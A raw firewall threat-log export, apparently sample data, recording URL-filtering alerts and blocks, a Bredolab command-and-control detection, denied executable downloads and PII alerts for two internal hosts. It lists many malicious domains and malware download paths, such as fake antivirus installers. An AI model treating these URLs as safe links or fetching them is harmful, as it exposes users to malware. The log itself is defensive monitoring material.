09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,"litetopdetect.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 
04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,"girlteenxxxfreemov.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,"imagesrepository.com/resolution.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,"hottestfiles.com/search/search.php?q=xxx",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,"infodist1.com/in.cgi?11¶meter=404",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,"cls-softwares.com/suc.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,"cls-softwares.com/softwarefortubeview.40013.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,78.159.99.224,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,"findmorepill.com/klik/search.php?q=xxx",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0, -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,"allowedwebsurfing.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 
04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,"antivirus-remote.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.cfg",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,"blogsexnakedgirlxxx.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 
09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 
09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:47 1,2012/10/30 
09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,69.43.161.167,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,"wantfinest.com/tds/in.cgi?default",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,202.31.187.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,"sameshitasiteverwas.com/traf/tds/in.cgi?2",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0, -Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,89.111.176.67,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,"svarkon.ru/update.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,"onlinescanxpp.com/land/eurl/1.php?code=",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,"nolagtime.com/gwc.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,"karavan.us/bon/index.php",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,"findnolimits.com/go.php?sid=1",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/moun.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:51:33 1,2012/10/30 
09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/palast.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,204.232.231.46,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,"controller.php",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,216.8.179.25,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,"www.15min.it/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0, -Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,69.43.161.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,"tubemov.com/",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,208.91.196.252,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,"pagesinxt.com/?dn=teenstube.us&flrdr=yes&nxte=js",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0, -Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,"movfree.com/",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,"gometascan.com/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/download/Install_11-1.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 
04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,"FunkyEmoticons_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:07 1,2013/03/25 
23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,122.226.169.183,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,"52hxw.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,"softsellfast.com/test/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,109.201.131.15,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,"setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,"Live-Player_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,"boialex.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:12 1,2013/03/25 
23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,"edw-melon.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,"maximtushin.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,"marketingsoluchion.biz/fkn/config.bin",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,207.46.140.46,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,"default.aspx",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 
1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,65.54.161.34,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,"sck.aspx",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,65.55.5.231,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,"ADSAdClient31.dll",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,65.54.71.11,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,"c.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,74.125.239.17,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United 